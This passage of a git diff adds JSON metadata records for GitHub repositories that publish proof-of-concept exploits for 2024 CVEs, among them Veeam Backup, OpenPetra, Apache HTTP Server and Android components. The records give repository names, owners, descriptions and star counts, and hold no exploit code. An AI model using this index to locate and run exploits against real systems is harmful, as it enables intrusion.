0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40422.json b/2024/CVE-2024-40422.json new file mode 100644 index 0000000000..787e4aeb6c --- /dev/null +++ b/2024/CVE-2024-40422.json @@ -0,0 +1,64 @@ +[ + { + "id": 823856753, + "name": "CVE-2024-40422", + "full_name": "alpernae\/CVE-2024-40422", + "owner": { + "login": "alpernae", + "id": 39368379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39368379?v=4", + "html_url": "https:\/\/github.com\/alpernae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alpernae\/CVE-2024-40422", + "description": null, + "fork": false, + "created_at": "2024-07-03T21:43:15Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-30T10:40:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838700943, + "name": "CVE-2024-40422", + "full_name": "j3r1ch0123\/CVE-2024-40422", + "owner": { + "login": "j3r1ch0123", + "id": 110147529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110147529?v=4", + "html_url": "https:\/\/github.com\/j3r1ch0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3r1ch0123\/CVE-2024-40422", + "description": "Found this on exploit-db, decided to make my own for practice. This exploit will search out the passwd file and print the contents on a vulnerable system.", + "fork": false, + "created_at": "2024-08-06T07:09:47Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-06T20:19:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40431.json b/2024/CVE-2024-40431.json new file mode 100644 index 0000000000..561cc6009e --- /dev/null +++ b/2024/CVE-2024-40431.json @@ -0,0 +1,33 @@ +[ + { + "id": 858573400, + "name": "CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "full_name": "SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN", + "description": "CVE-2024-40431+CVE-2022-25479 chain for EOP(DATA ONLY ATTACK) ", + "fork": false, + "created_at": "2024-09-17T06:28:17Z", + "updated_at": "2024-11-18T12:42:17Z", + "pushed_at": "2024-10-16T22:27:13Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 45, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40443.json b/2024/CVE-2024-40443.json new file mode 100644 index 0000000000..b302bae0a7 --- /dev/null +++ b/2024/CVE-2024-40443.json @@ -0,0 +1,33 @@ +[ + { + "id": 886294827, + "name": "CVE-2024-40443", + "full_name": "Yuma-Tsushima07\/CVE-2024-40443", + "owner": { + "login": "Yuma-Tsushima07", + "id": 63207324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4", + "html_url": "https:\/\/github.com\/Yuma-Tsushima07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2024-40443", + "description": "CVE-2024-40443 - A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands ", + "fork": false, + "created_at": "2024-11-10T17:35:14Z", + "updated_at": "2024-11-10T17:41:02Z", + "pushed_at": "2024-11-10T17:40:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40457.json b/2024/CVE-2024-40457.json new file mode 100644 index 0000000000..328d4ce1eb --- /dev/null +++ b/2024/CVE-2024-40457.json @@ -0,0 +1,33 @@ +[ + { + "id": 880953987, + "name": "CVE-2024-40457-PoC", + "full_name": "jeppojeps\/CVE-2024-40457-PoC", + "owner": { + "login": "jeppojeps", + "id": 7843530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7843530?v=4", + "html_url": "https:\/\/github.com\/jeppojeps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeppojeps\/CVE-2024-40457-PoC", + "description": "CVE PoC 2024-40457", + "fork": false, + "created_at": "2024-10-30T16:51:31Z", + "updated_at": "2024-10-31T15:14:04Z", + "pushed_at": "2024-10-30T16:52:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40492.json b/2024/CVE-2024-40492.json new file mode 100644 index 0000000000..30ca94ceb4 --- /dev/null +++ b/2024/CVE-2024-40492.json @@ -0,0 +1,33 @@ +[ + { + "id": 828086923, + "name": "POC_CVE-2024-40492", + "full_name": "minendie\/POC_CVE-2024-40492", + "owner": { + "login": "minendie", + "id": 92912837, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92912837?v=4", + "html_url": "https:\/\/github.com\/minendie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minendie\/POC_CVE-2024-40492", + "description": null, + "fork": false, + "created_at": "2024-07-13T04:57:48Z", + "updated_at": "2024-07-13T04:59:09Z", + "pushed_at": "2024-07-13T04:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40498.json b/2024/CVE-2024-40498.json new file mode 100644 index 0000000000..e1dae0a101 --- /dev/null +++ b/2024/CVE-2024-40498.json @@ -0,0 +1,33 @@ +[ + { + "id": 835178303, + "name": "CVE-2024-40498", + "full_name": "Dirac231\/CVE-2024-40498", + "owner": { + "login": "Dirac231", + "id": 74907503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74907503?v=4", + "html_url": "https:\/\/github.com\/Dirac231", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dirac231\/CVE-2024-40498", + "description": null, + "fork": false, + "created_at": "2024-07-29T10:13:15Z", + "updated_at": "2024-07-29T10:18:44Z", + "pushed_at": "2024-07-29T10:18:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40500.json b/2024/CVE-2024-40500.json new file mode 100644 index 0000000000..5d2e36ceec --- /dev/null +++ b/2024/CVE-2024-40500.json @@ -0,0 +1,33 @@ +[ + { + "id": 839960824, + "name": "CVE-2024-40500", + "full_name": "nitipoom-jar\/CVE-2024-40500", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-40500", + "description": null, + "fork": false, + "created_at": "2024-08-08T17:12:58Z", + "updated_at": "2024-08-08T17:45:53Z", + "pushed_at": "2024-08-08T17:45:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40506.json b/2024/CVE-2024-40506.json new file mode 100644 index 0000000000..cce4b063cf --- /dev/null +++ b/2024/CVE-2024-40506.json @@ -0,0 +1,33 @@ +[ + { + "id": 828350259, + "name": "CVE-2024-40506", + "full_name": "Jansen-C-Moreira\/CVE-2024-40506", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40506", + "description": "OpenPetra v.2023.02 CVE-2024-40506", + "fork": false, + "created_at": "2024-07-13T21:42:23Z", + "updated_at": "2024-07-13T22:08:39Z", + "pushed_at": "2024-07-13T22:08:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40507.json b/2024/CVE-2024-40507.json new file mode 100644 index 0000000000..7b22b69655 --- /dev/null +++ b/2024/CVE-2024-40507.json @@ -0,0 +1,33 @@ +[ + { + "id": 828351831, + "name": "CVE-2024-40507", + "full_name": "Jansen-C-Moreira\/CVE-2024-40507", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40507", + "description": "OpenPetra v.2023.02 Use CVE-2024-40507", + "fork": false, + "created_at": "2024-07-13T21:50:57Z", + "updated_at": "2024-07-13T22:09:08Z", + "pushed_at": "2024-07-13T22:09:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40508.json b/2024/CVE-2024-40508.json new file mode 100644 index 0000000000..f9812e171b --- /dev/null +++ b/2024/CVE-2024-40508.json @@ -0,0 +1,33 @@ +[ + { + "id": 828352382, + "name": "CVE-2024-40508", + "full_name": "Jansen-C-Moreira\/CVE-2024-40508", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40508", + "description": "OpenPetra v.2023.02 CVE-2024-40508", + "fork": false, + "created_at": "2024-07-13T21:54:07Z", + "updated_at": "2024-07-13T21:58:51Z", + "pushed_at": "2024-07-13T21:58:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40509.json b/2024/CVE-2024-40509.json new file mode 100644 index 0000000000..2313fd6da1 --- /dev/null +++ b/2024/CVE-2024-40509.json @@ -0,0 +1,33 @@ +[ + { + "id": 828353646, + "name": "CVE-2024-40509", + "full_name": "Jansen-C-Moreira\/CVE-2024-40509", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40509", + "description": "OpenPetra v.2023.02 CVE-2024-40509", + "fork": false, + "created_at": "2024-07-13T22:01:39Z", + "updated_at": "2024-07-13T22:02:57Z", + "pushed_at": "2024-07-13T22:02:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40510.json b/2024/CVE-2024-40510.json new file mode 100644 index 0000000000..e4117e94c2 --- /dev/null +++ b/2024/CVE-2024-40510.json @@ -0,0 +1,33 @@ +[ + { + "id": 828353896, + "name": "CVE-2024-40510", + "full_name": "Jansen-C-Moreira\/CVE-2024-40510", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40510", + "description": "OpenPetra v.2023.02 CVE-2024-40510", + "fork": false, + "created_at": "2024-07-13T22:03:17Z", + "updated_at": "2024-07-13T22:04:37Z", + "pushed_at": "2024-07-13T22:04:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40511.json b/2024/CVE-2024-40511.json new file mode 100644 index 0000000000..b54092ec86 --- /dev/null +++ b/2024/CVE-2024-40511.json @@ -0,0 +1,33 @@ +[ + { + "id": 828354193, + "name": "CVE-2024-40511", + "full_name": "Jansen-C-Moreira\/CVE-2024-40511", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40511", + "description": "OpenPetra v.2023.02 CVE-2024-40511", + "fork": false, + "created_at": "2024-07-13T22:04:53Z", + "updated_at": "2024-07-13T22:05:49Z", + "pushed_at": "2024-07-13T22:05:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40512.json b/2024/CVE-2024-40512.json new file mode 100644 index 0000000000..786cffacce --- /dev/null +++ b/2024/CVE-2024-40512.json @@ -0,0 +1,33 @@ +[ + { + "id": 828354452, + "name": "CVE-2024-40512", + "full_name": "Jansen-C-Moreira\/CVE-2024-40512", + "owner": { + "login": "Jansen-C-Moreira", + "id": 66726884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66726884?v=4", + "html_url": "https:\/\/github.com\/Jansen-C-Moreira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jansen-C-Moreira\/CVE-2024-40512", + "description": "OpenPetra v.2023.02 CVE-2024-40512", + "fork": false, + "created_at": "2024-07-13T22:06:16Z", + "updated_at": "2024-07-13T22:07:10Z", + "pushed_at": "2024-07-13T22:07:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40617.json b/2024/CVE-2024-40617.json new file mode 100644 index 0000000000..43845367dc --- /dev/null +++ b/2024/CVE-2024-40617.json @@ -0,0 +1,33 @@ +[ + { + "id": 835716921, + "name": "CVE-2024-40617", + "full_name": "KyssK00L\/CVE-2024-40617", + "owner": { + "login": "KyssK00L", + "id": 6824863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6824863?v=4", + "html_url": "https:\/\/github.com\/KyssK00L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KyssK00L\/CVE-2024-40617", + "description": "CVE-2024-40617 Exploit PoC", + "fork": false, + "created_at": "2024-07-30T11:50:45Z", + "updated_at": "2024-08-04T11:23:43Z", + "pushed_at": "2024-07-30T14:43:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40658.json b/2024/CVE-2024-40658.json new file mode 100644 index 0000000000..1e77147fef --- /dev/null +++ b/2024/CVE-2024-40658.json @@ -0,0 +1,33 @@ +[ + { + "id": 832468670, + "name": "frameworks_av_AOSP10_r33_CVE-2024-40658", + "full_name": "nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-40658", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/frameworks_av_AOSP10_r33_CVE-2024-40658", + "description": null, + "fork": false, + "created_at": "2024-07-23T05:04:03Z", + "updated_at": "2024-10-09T09:57:26Z", + "pushed_at": "2024-10-09T09:57:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40662.json b/2024/CVE-2024-40662.json new file mode 100644 index 0000000000..e995fb9492 --- /dev/null +++ b/2024/CVE-2024-40662.json @@ -0,0 +1,33 @@ +[ + { + "id": 874208395, + "name": "net_G2.5_CVE-2024-40662", + "full_name": "Aakashmom\/net_G2.5_CVE-2024-40662", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/net_G2.5_CVE-2024-40662", + "description": null, + "fork": false, + "created_at": "2024-10-17T12:39:21Z", + "updated_at": "2024-10-17T12:40:47Z", + "pushed_at": "2024-10-17T12:40:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40673.json b/2024/CVE-2024-40673.json new file mode 100644 index 0000000000..dac3c0165f --- /dev/null +++ b/2024/CVE-2024-40673.json @@ -0,0 +1,33 @@ +[ + { + "id": 874201744, + "name": "G3_libcore_native_CVE-2024-40673", + "full_name": "Aakashmom\/G3_libcore_native_CVE-2024-40673", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/G3_libcore_native_CVE-2024-40673", + "description": null, + "fork": false, + "created_at": "2024-10-17T12:26:24Z", + "updated_at": "2024-10-17T12:28:06Z", + "pushed_at": "2024-10-17T12:28:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40675.json b/2024/CVE-2024-40675.json new file mode 100644 index 0000000000..73aeeea7f0 --- /dev/null +++ b/2024/CVE-2024-40675.json @@ -0,0 +1,33 @@ +[ + { + "id": 874181651, + "name": "intent_CVE-2024-40675", + "full_name": "Aakashmom\/intent_CVE-2024-40675", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/intent_CVE-2024-40675", + "description": null, + "fork": false, + "created_at": "2024-10-17T11:46:29Z", + "updated_at": "2024-10-17T11:47:50Z", + "pushed_at": "2024-10-17T11:47:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40676.json b/2024/CVE-2024-40676.json new file mode 100644 index 0000000000..6860c45fda --- /dev/null +++ b/2024/CVE-2024-40676.json @@ -0,0 +1,64 @@ +[ + { + "id": 874173855, + "name": "frameworks_base_accounts_CVE-2024-40676", + "full_name": "Aakashmom\/frameworks_base_accounts_CVE-2024-40676", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/frameworks_base_accounts_CVE-2024-40676", + "description": null, + "fork": false, + "created_at": "2024-10-17T11:29:33Z", + "updated_at": "2024-10-17T11:33:08Z", + "pushed_at": "2024-10-17T11:33:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 874178814, + "name": "accounts_CVE-2024-40676-", + "full_name": "Aakashmom\/accounts_CVE-2024-40676-", + "owner": { + "login": "Aakashmom", + "id": 76400693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76400693?v=4", + "html_url": "https:\/\/github.com\/Aakashmom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aakashmom\/accounts_CVE-2024-40676-", + "description": null, + "fork": false, + "created_at": "2024-10-17T11:40:21Z", + "updated_at": "2024-10-28T05:12:15Z", + "pushed_at": "2024-10-17T11:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40711.json b/2024/CVE-2024-40711.json new file mode 100644 index 0000000000..fbe45972fe --- /dev/null +++ b/2024/CVE-2024-40711.json @@ -0,0 +1,95 @@ +[ + { + "id": 857817098, + "name": "CVE-2024-40711", + "full_name": "watchtowrlabs\/CVE-2024-40711", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-40711", + "description": "Pre-Auth Exploit for CVE-2024-40711", + "fork": false, + "created_at": "2024-09-15T17:25:32Z", + "updated_at": "2024-11-24T22:09:00Z", + "pushed_at": "2024-09-15T17:28:41Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 873392498, + "name": "CVE-2024-40711-Exp", + "full_name": "realstatus\/CVE-2024-40711-Exp", + "owner": { + "login": "realstatus", + "id": 41789399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41789399?v=4", + "html_url": "https:\/\/github.com\/realstatus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realstatus\/CVE-2024-40711-Exp", + "description": "CVE-2024-40711-exp", + "fork": false, + "created_at": "2024-10-16T05:02:27Z", + "updated_at": "2024-11-07T11:00:18Z", + "pushed_at": "2024-10-17T01:06:42Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892922773, + "name": "cve-2024-40711-poc", + "full_name": "XiaomingX\/cve-2024-40711-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-40711-poc", + "description": "CVE-2024-40711 是 Veeam Backup & Replication 软件中的一个严重漏洞,允许未经身份验证的攻击者远程执行代码。 ", + "fork": false, + "created_at": "2024-11-23T04:02:34Z", + "updated_at": "2024-11-24T05:52:50Z", + "pushed_at": "2024-11-23T04:02:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40725.json b/2024/CVE-2024-40725.json new file mode 100644 index 0000000000..0b54bbebcd --- /dev/null +++ b/2024/CVE-2024-40725.json @@ -0,0 +1,64 @@ +[ + { + "id": 830811519, + "name": "CVE-2024-40725-CVE-2024-40898", + "full_name": "TAM-K592\/CVE-2024-40725-CVE-2024-40898", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-40725-CVE-2024-40898", + "description": "CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.", + "fork": false, + "created_at": "2024-07-19T03:51:54Z", + "updated_at": "2024-11-28T16:04:54Z", + "pushed_at": "2024-07-19T04:01:13Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 64, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886594059, + "name": "CVE-2024-40725-CVE-2024-40898", + "full_name": "whiterose7777\/CVE-2024-40725-CVE-2024-40898", + "owner": { + "login": "whiterose7777", + "id": 174041119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174041119?v=4", + "html_url": "https:\/\/github.com\/whiterose7777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiterose7777\/CVE-2024-40725-CVE-2024-40898", + "description": null, + "fork": false, + "created_at": "2024-11-11T09:00:22Z", + "updated_at": "2024-11-12T08:52:37Z", + "pushed_at": "2024-11-11T09:01:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40892.json b/2024/CVE-2024-40892.json new file mode 100644 index 0000000000..ebc0baaa61 --- /dev/null +++ b/2024/CVE-2024-40892.json @@ -0,0 +1,33 @@ +[ + { + "id": 845664521, + "name": "fwbt", + "full_name": "xen0bit\/fwbt", + "owner": { + "login": "xen0bit", + "id": 21974988, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974988?v=4", + "html_url": "https:\/\/github.com\/xen0bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xen0bit\/fwbt", + "description": "Proof of Concept code for interaction with Firewalla via Bluetooth Low-Energy and exploitation of CVE-2024-40892 \/ CVE-2024-40893", + "fork": false, + "created_at": "2024-08-21T17:27:21Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-21T17:35:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": 